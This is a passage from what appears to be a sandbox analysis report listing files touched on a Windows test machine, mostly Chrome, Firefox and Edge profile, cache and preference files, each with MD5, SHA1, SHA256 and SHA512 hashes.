| SHA256 | 65e2a7a89e88d216842c2663fc9eecb090ac3c100afbacae115c875ba55439c8 |
| SHA512 | f5ed02fcc1fca0e638144dbf3472ac640bdd4d0890faa7e35ec4dddac0052db42d8d524d727c1ad99dc3ab3eb8b0643d05521068f03b4025d5a4d574b2b8afe7 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 2116a9f8dba1583c9ff092e3e8e71926 |
| SHA1 | c6fd6a0466dfc79fa005cf6c42d13333844bc0a5 |
| SHA256 | 7d254ef81c2a81904555ea02c72699c53fb5ff76431081d3a80e14d4bb99f954 |
| SHA512 | 1843b1da886dc802458e6ddadc2caa12fa665282c78d790cf1ec4efafdae1d63f4b116db8dacd58609c8203352049f9346288a42162ec4bfea3fb3f54bbb2b35 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | e4b3be7a83c3962fa9d2da2c3654b87e |
| SHA1 | 351d22970531e91293b73ca494e4a836591e8fd6 |
| SHA256 | 891d9e710b2794a3dc98c395f29eb9102463356d463415df4ce696a5844e444d |
| SHA512 | 7733c126665aa8519e50e3d27efe0dd8fdf13ddf1e136a13aa7beb257ef55ba9e3eae68f6bdeda92f0a9d7cdec94b8faae983e6653d66319106ee17e321511e2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | f1cac420d58f8f15d2a40accccccde96 |
| SHA1 | cc1a7788513c0826396cd00f629ccb40fc550ab3 |
| SHA256 | a590ca8c0afece7a479cc543d5ee429ce87c1e6a4d0ff8ca583e141ead5cd675 |
| SHA512 | 6517a898bad7ff6a35fa7ee46eb20add8b9163579f2ab4fd7656862fd7dc2d4606414185c4cd1f03b2a4dbb5e5b1153d22d4e66a33b99062470ceff8260d833f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 910f60081a6b5dac63084c3222dceabf |
| SHA1 | b5713f40cfebe98fabd806071a31b0001cf1f2db |
| SHA256 | cc5ff1c8277fe07148e56aa1bc559ea8a4522d3d9aab04ef21d4f2631fed340f |
| SHA512 | 92d585443bce6f4cc09ee17a417016d4d293da854cc9af412b2d9e89b945f878a2a3c501ca1626cdb431e24f34945cb44ffe9ba15e6b796251fd87dd832f624c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1
| MD5 | f50f89a0a91564d0b8a211f8921aa7de |
| SHA1 | 112403a17dd69d5b9018b8cede023cb3b54eab7d |
| SHA256 | b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec |
| SHA512 | bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\sd844ipy.default-release\activity-stream.discovery_stream.json
| MD5 | 1b43debc0a52a95bf8b5fa82060f12ef |
| SHA1 | 6b742f4b008c0b6c67e35660fd844e871431e08e |
| SHA256 | a7c1b23fb531502a8d2cade5a594e885c58fe1b338634193da1a02745782f62b |
| SHA512 | f38e319f8ca6335b16a2306315dd03a8ccee023ba9cfe56b06f585f78dadb4f15a163f028957935c6551ba5f11824f920a7a9aa1d760df3300211a0c361ed6c5 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\sd844ipy.default-release\datareporting\glean\pending_pings\bf65138f-25f3-4ece-ad92-b71885b485dd
| MD5 | 18f56e462bbcd7d9f58435fac9e724b5 |
| SHA1 | 862540935b32cb47f17136f9cb6ae8c601590ead |
| SHA256 | 54c85f2ba3077d37a4e07113ee453084fa7e3ebc2e526892d057633a045e886b |
| SHA512 | ffcb3ef04269556d55e99b7ca2959ca08adb935fb55b2a081b1f9b2ccbc9dc20662aceb554a30c7236dbe6cc060a636f8f28917e8af9d9e09716c4c867be4e9d |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\sd844ipy.default-release\datareporting\glean\pending_pings\5fc3bd2e-68ef-41f2-94a2-a944321ea940
| MD5 | 39f21393b3901a40e130ffc5d53d1066 |
| SHA1 | f33a1a9a693f91ea184093c6319b01df408fc870 |
| SHA256 | 9a470393d177cbd022eef56b7f88229c8ad43d9e0b00f83590f9ae62ab972b33 |
| SHA512 | 84c9d98de382f54de6eae03eb4e74db3725b7d0201276209c02d58336cd50de247312a999b7931c15dcb882c1e9a02154c513664bc340aa0ee7baae2d3f565e2 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\sd844ipy.default-release\datareporting\glean\pending_pings\78e06320-be24-4cf5-9fec-5fbf79e42dcc
| MD5 | abc06f9a07e6d0dc6b8d2c96d5b1647f |
| SHA1 | 41fb934c972d6fbdd1c6be0f7fbf379d9d7da07f |
| SHA256 | 74a53289b27bf159db8b5c2ec501cc859d8ca4931ed9d7a777617717e2e1403b |
| SHA512 | 57b7f58d8209a983de4cd4a273fd62de5fa5a4a050fccf109dba7c0754c03625f3b50a4819cf3b0d329274f82d700519170850dbaf42aba68cc88506ed4c56d8 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\sd844ipy.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | 84bc0cc9f27b15606e04c6b77175f528 |
| SHA1 | 7b4599c8b0eae79a2c606b1e58a617913454e917 |
| SHA256 | cbe3cc93aa97f7f9e342d01558b0952f889061e5090528480dda1b12c4c41e15 |
| SHA512 | 571f5ed586c2fc6c346de3f6abbb7103b91f4e11e9e37d8ec7160058dde50abfc08604ba4ab7b7bda60b16556a49903b009eae718d6f15f20fa66b70e6634106 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\sd844ipy.default-release\prefs.js
| MD5 | e39694f9207dfaca3de1046509a591f2 |
| SHA1 | ec6d08bd4ba68b62210e6478a1d5f8ab9b799652 |
| SHA256 | a03a834bf4886cf6d556d0413f7c714699d05b4b0c302179ae7a31769144b07b |
| SHA512 | 71c2d62f62443d72ac9b3c9d6fbaa4f9403932b9308447e6e4724bd551fc6bcda2789f6a40d23470e04c0c1c24533396170063f50184e30e1d5776bbac937a93 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\sd844ipy.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | e35865ce92cc84bb931526af18f7e11c |
| SHA1 | ab02c2eed8ee530615f43490c556c48fc0f5c6ab |
| SHA256 | 1fef7064feaa96451e5ba2acdf64dd4f0f4bda74a053f02254138b3d43f2a9ae |
| SHA512 | 6093c2641ad776d7930d5f4cc067d7a8cfc4cff187076ab1caebe304f71767b7e0c3abbb2a0227d521e472c55b4abf23322efe5a431e23e94fb5f8cb3eb0da90 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\sd844ipy.default-release\AlternateServices.bin
| MD5 | 10e0b5e0175400d87aceab7222033552 |
| SHA1 | 12ae4821391bff2cd5de534a7dfec5c4c0285528 |
| SHA256 | 5653fe7480c598778febf5821ead742d128af1806b50c475703b2f95bc4d162a |
| SHA512 | 8f0d012e5cf983cf22d08e4836d4e6dfbc5d39d72e211c83b3ad9e8fbc6b4552661332f2e9761b2cb06fed3153132b2919816b8e039c9640db4211d7899a767b |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\sd844ipy.default-release\cache2\entries\AE6C91A7A94F8219B78F6FB4AEBCFA5DD3A78D91
| MD5 | 754b1330d103922e5af88bc68b6a0f9a |
| SHA1 | 12497c22166b72f96d0321f218abb807f900de58 |
| SHA256 | e1c850b2a182863ffa6af47772a400278a05fd89aba26999356189450286ad20 |
| SHA512 | 14b388c208bf06370aa32d837f449e7042f4fe69e3d4172689e4920e1cbcf2745c42760b5114a596c981967f5da9e20cd7c42e327f50dbb6b188ebbe6916c01d |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\sd844ipy.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | 4cd27658f440f416f50809e99281b985 |
| SHA1 | c3a6dc768c6531d2c70f58351f9df119428918f9 |
| SHA256 | a938485347b53f4d8a5a72a22b7f1b39e3f7861e2452cb0ab561b5041b095043 |
| SHA512 | 92a6fe708346b33ae3b070e0c7d758230bfeeff311e66ffac85d0ba6132d7b6b151782d59201c835544c28eae27f167408452faf31ac793a710f1eb44b07f9a6 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\sd844ipy.default-release\prefs-1.js
| MD5 | 968617df4efddb4e2137a55463d17ebe |
| SHA1 | 98d47ff02213d1fd8d2bf582502cb25fce3bd668 |
| SHA256 | 831917f0c556c96d40c0491c5af01d66de754df0d8754498af0ab1f811a8baec |
| SHA512 | 08552f705b9b52009eb041604c32d4ed184c7c0686ad05b4d38b77cbfbf636d81d95c12d9e32cf24204e92126f1088b36b271de0dddd42ae9622baa22fbb3e1f |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\sd844ipy.default-release\datareporting\glean\pending_pings\4cdb76a0-f108-4c75-953f-43f81cbda4fa
| MD5 | e9dc710ce3ac3ec499e0753924144fa0 |
| SHA1 | 9d13088fd03338fa96d6bd768ad25d8d4a621eab |
| SHA256 | 4cff526f646c2d6bf146d722e2e21232fe7b1ba0cc4ba2e645d5e42942d9af10 |
| SHA512 | 91db48fb8d560383ed25619d90111c0ddaae563b3278a36c0d6a3b764b31d99bb64daf6477847c372b90ceab3dd8ec4f61f14f8d24c79c09fd675aa8b4a8b6ec |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | f6126b3cef466f7479c4f176528a9348 |
| SHA1 | 87855913d0bfe2c4559dd3acb243d05c6d7e4908 |
| SHA256 | 588138bf57e937e1dec203a5073c3edb1e921c066779e893342e79e3d160e0b4 |
| SHA512 | ef622b26c8cee1f767def355b2d7bffb2b28e7a653c09b7e2d33f6468a453fff39fd120cacbffd79ce35722592af0f3fb7d5054e2dca06310e44dc460533f3d8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico
| MD5 | e5e3377341056643b0494b6842c0b544 |
| SHA1 | d53fd8e256ec9d5cef8ef5387872e544a2df9108 |
| SHA256 | e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25 |
| SHA512 | 83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 6dda6e078b56bc17505e368f3e845302 |
| SHA1 | 45fbd981fbbd4f961bf72f0ac76308fc18306cba |
| SHA256 | 591bf3493eb620a3851c0cd65bff79758a09c61e9a22ea113fa0480404a38b15 |
| SHA512 | 9e460013fd043cee9bdbcdaf96ac2f7e21a08e88ddb754dddbd8378ee2288d50271e66b42092d84a12e726469465185be11a6fafab6ed4236a244524bd60f502 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\MANIFEST-000001
| MD5 | 5af87dfd673ba2115e2fcf5cfdb727ab |
| SHA1 | d5b5bbf396dc291274584ef71f444f420b6056f1 |
| SHA256 | f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4 |
| SHA512 | de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 027387e4e42f6bc0faeab15941009a53 |
| SHA1 | 090603fa68a1ac561b46ca0871e4d1e09807eed3 |
| SHA256 | b48089786141ac8f29cf4aacffde0a29a3b1b1950c6da914c37a087cdb2a711f |
| SHA512 | 715a0adc9b917402e854f6278168cd3d160a883c3e39d75a614d37c69511a12b4ae2ee30b7950a9a77eed2cbce013995805e5a7a7d52258ee7f6f8b62dd99975 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | 90cc75707c7f427e9bbc8e0553500b46 |
| SHA1 | 9034bdd7e7259406811ec8b5b7ce77317b6a2b7e |
| SHA256 | f5d76f8630779de1fe82f8802d6d144861e3487171e4b32e3f8fffd2a57725fb |
| SHA512 | 7ad692bce11aee08bf65bb7c578b89a4a3024211ee1deaf671c925d65cc016943f2caad3d57b365e16d1764c78c36cae35c3c45cef0928dd611a565b0313e511 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | fc326b7183ff1cb08fea6b710ec90b69 |
| SHA1 | 1579ce6a95b3fc66870a4ed88d3e2a3769e82435 |
| SHA256 | 447ede4e0f7de46319b51f1167d76a59c227bb4cca3cfc379eab969c512696b0 |
| SHA512 | a181ddfaedf82135f277e9e68805f50ccf9f23e2cc9a3c80dac4063063b4769f1620f4cfce0ea907ae1dab09f6f4137b1f0528e13098e6a0cb10fa3a10c32e67 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | be5b9d250a24ffa04acafbbe5c810307 |
| SHA1 | 8ba1ed6fb019be5772377093aec8107cf650c931 |
| SHA256 | 4814abbe163df4b189715b0b6d2920682322ecf1e7b306144b9cdf2b2505def0 |
| SHA512 | aeca2f2454e1903759d75cef31d40c5e10d520926c9bdd0725cc814b4935a207e175935dada24623fcb54a03ce137090aaf6976c67185e218d11a9959a552e69 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | 0d8c8c98295f59eade1d8c5b0527a5c2 |
| SHA1 | 038269c6a2c432c6ecb5b236d08804502e29cde0 |
| SHA256 | 9148e2a2ba2a3b765c088dc8a1bdcc9b07b129e5e48729a61ebc321cb7b8b721 |
| SHA512 | 885a734a97a6f8c4a8fb5f0efa9fe55742f0685210472ed376466e67f928e82ddf91ba1211389d9c55dd1e03dc064aa7a81d1fca3cf429fbaf8f60db8b1348c6 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
| MD5 | 8244d03b6e6d8f8636b970ce9e49fa2a |
| SHA1 | 186e613179d5b1f9795b846e48250fd8ef00b8f7 |
| SHA256 | 192a53f247d82300062af78eeb8bac74c81767f1d3d01e77d38e3ecefe2b95c6 |
| SHA512 | 545f332059bf3da3035be29659b4c341476184cc6d870b4d4318463fb96e6ff7af111663db7148d78bd1fa48f2acd67fe8b1f623959340a1ef949003777f7104 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
| MD5 | 9cb8360805a43c8464e1fd67e4b00370 |
| SHA1 | bab3e77c0f77a382d235eec1f946a1283affb285 |
| SHA256 | 5a510aa99689eebc7ac9d5b10d6826f01c1714bafb87025ca714a536fb93afa1 |
| SHA512 | 6770c908e887c31936c6edf8dc18d3e73397de2d16f76f945152a21bb1372e8dae25a4968fcf817f5e516775233849b8f9c34a857f4318d07a94d134105a7ebf |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 206702161f94c5cd39fadd03f4014d98 |
| SHA1 | bd8bfc144fb5326d21bd1531523d9fb50e1b600a |
| SHA256 | 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167 |
| SHA512 | 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004
| MD5 | fb2f02c107cee2b4f2286d528d23b94e |
| SHA1 | d76d6b684b7cfbe340e61734a7c197cc672b1af3 |
| SHA256 | 925dd883d5a2eb44cf1f75e8d71346b98f14c4412a0ea0c350672384a0e83e7a |
| SHA512 | be51d371b79f4cc1f860706207d5978d18660bf1dc0ca6706d43ca0375843ec924aa4a8ed44867661a77e3ec85e278c559ab6f6946cba4f43daf3854b838bb82 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003
| MD5 | c3c0eb5e044497577bec91b5970f6d30 |
| SHA1 | d833f81cf21f68d43ba64a6c28892945adc317a6 |
| SHA256 | eb48be34490ec9c4f9402b882166cd82cd317b51b2a49aae75cdf9ee035035eb |
| SHA512 | 83d3545a4ed9eed2d25f98c4c9f100ae0ac5e4bc8828dccadee38553b7633bb63222132df8ec09d32eb37d960accb76e7aab5719fc08cc0a4ef07b053f30cf38 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005
| MD5 | 76a3f1e9a452564e0f8dce6c0ee111e8 |
| SHA1 | 11c3d925cbc1a52d53584fd8606f8f713aa59114 |
| SHA256 | 381396157ed5e8021dd8e660142b35eb71a63aecd33062a1103ce9c709c7632c |
| SHA512 | a1156a907649d6f2c3f7256405d9d5c62a626b8d4cd717fa2f29d2fbe91092a2b3fdd0716f8f31e59708fe12274bc2dea6c9ae6a413ea290e70ddf921fe7f274 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000006
| MD5 | 710d7637cc7e21b62fd3efe6aba1fd27 |
| SHA1 | 8645d6b137064c7b38e10c736724e17787db6cf3 |
| SHA256 | c0997474b99524325dfedb5c020436e7ea9f9c9a1a759ed6daf7bdd4890bdc2b |
| SHA512 | 19aa77bed3c441228789cf8f931ca6194cc8d4bc7bb85d892faf5eaeda67d22c8c3b066f8ceda8169177da95a1fe111bd3436ceeaf4c784bd2bf96617f4d0c44 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | abcf9830a5c361aefc8890bd4ec21169 |
| SHA1 | 602ffd61aea70f0c7a3595b47828d2c47a6280b9 |
| SHA256 | 428a838d504f97d77b5cacd8cf00173002c493b93e967d83ca39c48f36006a2d |
| SHA512 | 957111d8e50e8052768c819602886e9baac28ff11798023624c86a47f426b752e78e9b41fe1230427f84b4b51534c1751cb7b551b84150dfb470a8666ecb659c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000002
| MD5 | 55a93dd8c17e1019c87980a74c65cb1b |
| SHA1 | 4b99f1784b2bb2b2cc0e78b88c5d25858ff01c5d |
| SHA256 | 4925dd477b8abf082cb81e636f8d2c76f34d7864947114fc9f1db0e68b5a9009 |
| SHA512 | f9ade542c593067dbcd13ed94da1ba17a84782575355396db8fd7c28aa70a3120d0c0a22d3ca3d2f0774c1dcb06b9319e243b36001c618c92e0af25cb9c8e46b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000007
| MD5 | cd74fa4f0944963c0908611fed565d9b |
| SHA1 | c18033d8679d742e2aab1d6c88c28bd8f8a9e10d |
| SHA256 | e432edfafbd52fcdbd59ef74892aa2e2ab19df6647ae723b368fca529066a804 |
| SHA512 | b526216bdbc73a97db41edbec6fdfd09b7b4ae149d415fb5811dde03ad4b1b0247950abd78fef807ae47674ab1b56ff0b971fa5e305b26bc92dc07871313b750 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | d665bcf5fa1476cafd7b9ad58689b48c |
| SHA1 | 442a040dc4b34964b325e6fb6b1d5e06fde71d5e |
| SHA256 | eca717826a017064cbc4fb1e43e56c3699b41fb0c775eb3951683cb59591614c |
| SHA512 | ed140fcdedac1acca0f035f465e5d9c6213e10c08bfdde410a398d877fddde8e104c332fa6b3e4758f74bc03cf97fc7dd57d98e22160a7366c541ccccbf7385b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe59624a.TMP
| MD5 | abd055a30d9be33eeb8830ae900bc77b |
| SHA1 | cd6ccd258fcf6addec32f9425a13b54fdbd66fa1 |
| SHA256 | 26b4084650de64c44ab507932a838b6a5d47c6b77aeceae3bde0354d2837ca03 |
| SHA512 | 6b7c0b4ac57799545fa453622f733c25899a86324d3eee54e23ebcec7cb1f2d427e1acf25eac919fec7714ecf2e8f6795a7562cc48a8c344854127b2937b6cb6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 42ec4656a0264aebf92aa6c13d2945e7 |
| SHA1 | 74e712f0bae818bdbb563034aadf5b81db9f6939 |
| SHA256 | 9134882264a50aa1f111e317c01af5e2e9b323675034e0b81e98981a3a891a63 |
| SHA512 | 31b115b805640b9fcf1497b1853fa7ae4cbc39c5821564b0959bc17fc4ed69299bdae8f9f943afef7a4618dd76092de75529982b6b68cd4b0132895d753c2262 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 3a179cdd14370c55490dedda45ec3c7c |
| SHA1 | 431a6022e1b99dbace2802de5de1574bec73719f |
| SHA256 | 59110c726d5d8c767e629a1e6395572bb5265863075fa8065a472d4d6bdd042b |
| SHA512 | 1ed32450ce42312cc7e75c2c731f426bf37a95c6174b832c16646b4a57b094cd1305b57ed784671fee61ce4aca3043390e6491cd392b78a2070d0c4faceb850c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000049
| MD5 | 87e8230a9ca3f0c5ccfa56f70276e2f2 |
| SHA1 | eb116c8fd20cb2f85b7a942c7dae3b0ed6d27fe7 |
| SHA256 | e18d7214e7d3d47d913c0436f5308b9296ca3c6cd34059bf9cbf03126bafafe9 |
| SHA512 | 37690a81a9e48b157298080746aa94289a4c721c762b826329e70b41ba475bb0261d048f9ab8e7301e43305c5ebf53246c20da8cd001130bf156e8b3bd38b9b8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | c294f7cdd5b2e8258fc14e49f7a33259 |
| SHA1 | dd5397d00c3d2442e711409a469f86b70b05c741 |
| SHA256 | 7224c18bb6bc76482c36b28074ab8a1c17b812ee77a6768ec180954857736b49 |
| SHA512 | a76c3d66756e5caa257dc9cad430bfaaad17ab12fceb98e77377de5fb90d4553eae77e061dcc8ecc9c8e354224dd668bfa4edc4afd2802bdb59c33c2376b4de5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 8ae77e232de2c2dada499f9c55d3266b |
| SHA1 | bad8b4abd6c70ba377d51b591c42d85000a9d271 |
| SHA256 | a1b67c544911654eb42bf79528d3dcc2a701cadd894a6b9417c4c1d729442b70 |
| SHA512 | d11bfa2f9999deb09b8f3fdf94bd081325cfd16f5d0b2c922ecf90f7de06c708f6bbb5b9cc94560f86345e27498d1aebdd851838efc575aa647d82475812cc23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000058
| MD5 | bdbca6cd39a21b94af5e37a7d95cd7b1 |
| SHA1 | 3bbd7a9c40294b9f26a7fda297a07cf68f4274a8 |
| SHA256 | fa016fd584f843b1373b82746add6f4ecc0bd88711e9e85546dd9270e77cac50 |
| SHA512 | 930121da974124d737bfd6971014a2127dd1e5c383eeb643d7eabc822c867068c261f7d978a2c86f2237a98053ae3dd26a00624d8f0233ed04b4d2c0f8ead102 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | ad484bec792e50953bddf6750133fcef |
| SHA1 | 67ff6331148ae58e1b58ebc3792f740d7903527b |
| SHA256 | 56237e3e81429914d3b81fb512449705f5b28241fa9898f9b5855bb77ef94862 |
| SHA512 | a1c9d2a92410bb7091f1506b3b2322b96fc57f4c54d6c5e6b5af7e6b1d900c69e23d833fec0ac22465e892d1086959d864d025364fb7d899812a294a98962029 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000f
| MD5 | 125b478320064eb0901a4e2742d3abbf |
| SHA1 | 7805d771617cb444bc063d470828ad50b74e7e49 |
| SHA256 | 6c830e115a3e8e60d44b06b18414b036368a93fc7d649997f8bb39799caa7090 |
| SHA512 | 44528e48891ebb617899c7ea52f542d20cfb58fedb9fb63b533f573773076aac53d754dbd63e319f24dfe0f5c15e6fd5c98511aa40d89b20514ea1b21850e4dd |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000010
| MD5 | bf5fa4de24f671447a2bc00077936f7c |
| SHA1 | 1842a19b95d3ece9c99daafc4fc0e51870bec266 |
| SHA256 | 08b7c27265020e0da11a7463473d48166e4e753da1fa77f3cd0fd6800a290283 |
| SHA512 | 0d2a16be4a3f01bff51c7cd47230043dac7c17e8b0750009edb51b8224edef1d32a737646a944757b38a3a787787d34da6c82a9af1678dda02534ac421fdb18f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000011
| MD5 | 4fdb7fe5b56044702f174f5853a2c13e |
| SHA1 | 9ef43a08ecbb7545913fd3cd14a63327c65a0f6c |
| SHA256 | fcdb88c20936d82f3448c7e2d3bd94e42be5e82275fa545db276cfe8d1cf49a5 |
| SHA512 | c81a1d26f0e249e379a40b216ed7f67913f2df96c573d431354af2db90bb25304512c6a22d715649ec38aae73dec06d4a2b653f31b4e6ca08e34f077e14c2fe1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000012
| MD5 | 526c25b254a7582632c2bed848b6ea9c |
| SHA1 | 0e6dcca312d1a411b4876948fd1b4073381b0503 |
| SHA256 | 54b423604867beec2bc74ddaa3d572ff3e742a019a08e81996f094e458dae45a |
| SHA512 | 67218197bdc72aafe93c3819f80f5036699f439ae94696ce9bd614a39bf2902daabe7c9898d404fb25aaf71595ed139220a9da4f70199793fc6a028d1c68f777 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000036
| MD5 | dee46781c0389eada0ac9faa177539b6 |
| SHA1 | d7641e3d25ac7ac66c2ea72ac7df77b242c909d3 |
| SHA256 | 35f13cf2aef17a352007ab69222724397e0ec093871ff4bd162645f466425642 |
| SHA512 | 049b3d8dcfb64510745c2d5f9e8046747337b1c19d4b2714835cc200dc4ba61acaa994fec7c3cd122ba99d688be6e08f97eb642745561d75b410a5589c304d7d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | c88a888c8c3fb26ba6c82c56280d5f51 |
| SHA1 | a3c19bcc7b77201ead43f88517f158ed0cf92641 |
| SHA256 | f17025abee2acdd4ffc164903208883b9bfbec93e50e03c2f2412f6b5528c2cc |
| SHA512 | f992cbb22fbf34296c22c3a07ab8806044e1b32eb39b60233b4d1ba8cad3f4ff241422d1085ac3e09b14959a021f8f35e56bd482e7fc38ef14c4745fa9f96f81 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | ed2ddab2f4ebf4c0e8aaccf9b8cd6183 |
| SHA1 | 63d385ee4f8fc29bc502527cb93c7e23ad522429 |
| SHA256 | c8ec6538df8dfd1b165029ddc3be7a6cc5d24453b432b336604351ff77a2ea8e |
| SHA512 | 57901cc83d31ea62b05d82cf61fe711f8ba3d965168fff44c5f6496a35e23f1c2a083cc69957c4a4af37d0e663ff22414f8743a5256e3cda9929924f7a3114a4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State~RFe59e5e2.TMP
| MD5 | 2800881c775077e1c4b6e06bf4676de4 |
| SHA1 | 2873631068c8b3b9495638c865915be822442c8b |
| SHA256 | 226eec4486509917aa336afebd6ff65777b75b65f1fb06891d2a857a9421a974 |
| SHA512 | e342407ab65cc68f1b3fd706cd0a37680a0864ffd30a6539730180ede2cdcd732cc97ae0b9ef7db12da5c0f83e429df0840dbf7596aca859a0301665e517377b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 337fe7dd611f32e1a30a4c59886aca08 |
| SHA1 | 4e4a9490c85f2ef2ebf6598ba3e9c53e14d3d969 |
| SHA256 | 2522e270713457687f618a610abdd0b1fc7b9b97d2a4be2bcaa65fb39b0a5ef2 |
| SHA512 | 580019701eebcfa0d79e178bd9f7d11524633bd5badd338d632aeb60264cb180c4f6df6b5450ddf5a243e9d016800a11dd997c49e5a9bb2ebf293e46868ac860 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000075
| MD5 | 6327624317701c6c4924c87cfe7cd97a |
| SHA1 | 27389d815244682780bffef61856db93589b3ca6 |
| SHA256 | d3d2f1a5cb6c279d8b34d82680d68ce110054353249e9a2636bbb452cb7ecdcd |
| SHA512 | b5cf6c5fd48dcafe57eeae6693d184e90a79fa3232b48b2518badcae3138c8b15b19d4ee95847dfd437cc852a9e6dacd7f22f49612e70bf3bea7f10aea4df533 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 8d072a0fa96f48c31c364e0decf26a35 |
| SHA1 | b5a717d66d26ccaae6ffb7f72355204956a544cb |
| SHA256 | 3fc47075ea5364c7e97ca2735854f80afdb11b2affbba7ec11132ff9c7c1780e |
